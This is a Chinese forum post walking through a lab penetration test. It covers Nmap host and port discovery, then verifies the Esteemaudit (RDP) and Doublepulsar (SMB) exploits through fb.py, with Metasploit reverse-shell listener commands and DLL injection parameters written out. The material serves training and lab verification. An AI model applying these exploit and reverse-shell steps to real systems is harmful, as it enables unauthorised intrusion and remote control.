首页
社区
课程
招聘
[原创]内网渗透测试实验
发表于: 2017-7-22 22:59 2018

[原创]内网渗透测试实验

2017-7-22 22:59
2018

发现内网主机,测试验证Esteemaudit和Doublepulsar

在做内网渗透攻击时,首先要找到内网的主机,然后发现主机的漏洞,根据漏洞再进行攻击。在这篇文章里,主要介绍查找主机、主机漏洞以及验证的方法。

0.搭建环境

我们使用kali linux进行扫描,这个linux系统下载在https://www.kali.org/网站上,是目前世界上最流行的漏洞探测系统集成版本。kali是基于debian系统的,很多软件即使没有默认安装在系统上,你也可以通过系统下的apt-get进行安装。对于这个系统感兴趣的人可以下载并安装试试。当然下面介绍的扫描软件很多在windows上也能运行,你也可以不用安装kali而使用这些软件。

Esteemaudit(3389)渗透和验证系统为Win2003,具体配置方法如下:https://wenku.baidu.com/view/430e9e96964bcf84b9d57bd4.html。Doublepulsar(445)渗透和验证系统为攻击机 windows 7 x86 sp1,靶机 windows 7 x64 sp1。

1.内网扫描

Nmap是一款网络扫描和主机检测的非常有用的工具。 Nmap是不局限于仅仅收集信息和枚举,同时可以用来作为一个漏洞探测器或安全扫描器。KaLi Linux自带Nmap软件

在KaLi Linux上使用Nmap扫描内网192.168.4.0/24网段的主机:


15分钟才扫描了不到60%,而且,一台主机都没有发现,有问题,估计是防火强的存在导致扫描速度变慢了。

这时,你应该多查查nmap的命令,目前nmap是非常全的扫描方式,所以换一种方式,你可能会更快的扫描:


不到4分钟,你就可以看到4网段有哪些主机存在。


4网段UP的主机,目前活跃的主机


有些主机可以获取名字,这些主机一般都是windows域登陆账户

 

2.主机端口扫描

找到主机,找一台看看它开放了哪些端口,还是使用nmap工具


这个主机打开了ftp服务、ssh服务、139、445、514端口也都开启了。

3.寻找Esteemaudit(3389)漏洞。

通过msf创建dll,用于返回一个shell。


然后监听设置的端口,等待返回shell。

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set LHOST 192.168.4.2

set LPORT 4444

exploit


启动fb.py,配置基础参数

use Esteemaudit,这3个dll根据本地路径设置


X:\Xxxxxx\windows\storage 三个dll 都在该目录下

4.成功验证Esteemaudit

use Pcdlllauncher 注入dll

其中下面几个参数的路径需要重新设置

LPFilename D:\DSZOpsDisk\Resources\Pc\Legacy\PC_Exploit.dll] 该参数自己根据情况设置,文件在x:\xxxxx\windows\Resources\Pc\Legacy 该目录下。

ImplantFilename  参数 设置为要注入的dll的路径,就是刚刚通过msf生成的dll,配置成功后,msf收到shell回连。


5.验证Doublepulsar(445)漏洞

运行fb.py


填写IP信息


填写LOG目录,创建工程

选择利用程序

选择os和模式



选择利用程序


选择协议和攻击架构


选择需要运行的功能

选择需要注入的DLL,注入的函数序号,注入的进程等信息



编写的一个简单测试DLL


靶机注入成功,执行calc.exe进程




[注意]传递专业知识、拓宽行业人脉——看雪讲师团队等你加入!

收藏
免费 0
支持
分享
最新回复 (0)
游客
登录 | 注册 方可回帖
返回
//